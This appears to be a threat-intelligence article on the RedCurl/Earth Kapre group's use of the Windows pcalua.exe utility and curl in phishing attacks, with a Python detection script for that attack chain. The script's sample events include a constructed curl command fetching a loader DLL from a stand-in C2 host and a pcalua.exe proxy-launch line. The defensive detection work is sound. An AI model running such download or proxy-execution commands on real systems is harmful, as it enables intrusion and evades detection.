The Russian-speaking cybercrime group called RedCurl is leveraging a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands. The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.
RedCurl, which is also called Earth Kapre and Red Wolf, has been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
Origins and Activities:
- RedCurl is a Russian-speaking hacker group that has been operating since at least 2018.
- Between 2018 and 2020, they carried out at least 26 attacks on private companies.
- The group’s primary objective is to steal internal corporate documentation, including sensitive information and commercial secrets.
- Victims span different sectors, including construction, finance, consulting, retail, insurance, and law, in countries such as the UK, Germany, Canada, Norway, Russia, and Ukraine.
Attack Tactics:
- RedCurl employs phishing campaigns as their primary attack vector.
- They send malicious emails containing attachments (such as .iso and .img files) that lead to successful infections when opened.
- The group demonstrates extensive red teaming skills and can bypass traditional antivirus detection using their own custom malware.
- Their attacks are well-prepared and specifically target organizations for corporate espionage.
Recent Activity:
- In 2021, RedCurl resumed its attacks after a period of inactivity.
- Group-IB, a cybersecurity solution provider, detected their updated arsenal and identified four attacks since the beginning of 2021.
- The group’s success in stealing sensitive corporate data could potentially set a new trend in the cybercrime landscape.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information. The attack chain examined by Trend Micro entails the use of phishing emails containing malicious attachments (.ISO and .IMG files) to activate a multi-stage process that starts with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that establishes a connection to the same domain curl used to fetch the loader. The attack also used the open-source Impacket toolkit for unauthorized command execution. The attribution to Earth Kapre rests on overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
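The chain described above (cmd.exe fetching curl, curl delivering the loader DLL, the DLL using pcalua.exe to spawn a downloader) lends itself to process-lineage detections. The Python below is an added example written for this article, not code from Trend Micro or Red Sky Alliance; it assumes Sysmon event 1 / Windows 4688-style process-creation fields, relies on pcalua.exe's `-a` launch switch (not mentioned in the article), and runs over constructed sample events whose host name and file paths are invented.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

@dataclass
class ProcEvent:  # one process-creation record (Sysmon event 1 / Windows 4688)
    parent_image: str
    image: str
    command_line: str
# Where a program started through pcalua.exe is expected to live, and where it is not.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def detect(ev: ProcEvent) -> list:
    """Return the names of the chain stages this single event matches."""
    hits, cmd = [], ev.command_line.lower()
    # Stage 1: cmd.exe driving curl to fetch a DLL (the ms.dll / ps.dll loader step).
    if (image_name(ev.parent_image) == "cmd.exe" and image_name(ev.image) == "curl.exe"
            and re.search(r"https?://", cmd) and re.search(r"-o\s+\S+\.dll\b", cmd)):
        hits.append("cmd_curl_dll_download")
    # Stage 2: pcalua.exe used as a launcher ("-a <target>") for a program outside Windows/Program Files.
    if image_name(ev.image) == "pcalua.exe":
        m = re.search(r'\s-a\s+(?:"([^"]+)"|(\S+))', cmd)  # quoted or bare target path
        target = (m.group(1) or m.group(2)) if m else ""
        if target and not target.startswith(TRUSTED_PREFIXES):
            hits.append("pcalua_launch_nonstandard_target")
    # Stage 3: the downloader itself, spawned by pcalua.exe from a user-writable path.
    if image_name(ev.parent_image) == "pcalua.exe" and any(
            d in ev.image.lower() for d in USER_WRITABLE):
        hits.append("pcalua_child_user_writable_path")
    return hits

def scan(events) -> list:
    return [(ev.image, detect(ev)) for ev in events if detect(ev)]

# Constructed sample telemetry; the host name and file paths are invented placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\curl.exe",
              r"curl.exe http://c2.example.invalid/ms.dll -o C:\Users\Public\ms.dll"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\pcalua.exe",
              r"pcalua.exe -a C:\Users\Public\downloader.exe"),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Users\Public\downloader.exe",
              r"downloader.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\pcalua.exe",
              r'pcalua.exe -a "C:\Program Files\OldApp\setup.exe"'),  # benign PCA use
]
```

The benign fourth event shows why the target-path check matters: PCA launching an installer under Program Files is normal and should not page anyone.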
"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries. The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within targeted networks," Trend Micro reported.
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor. Pelmeni, which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS, is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar.
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989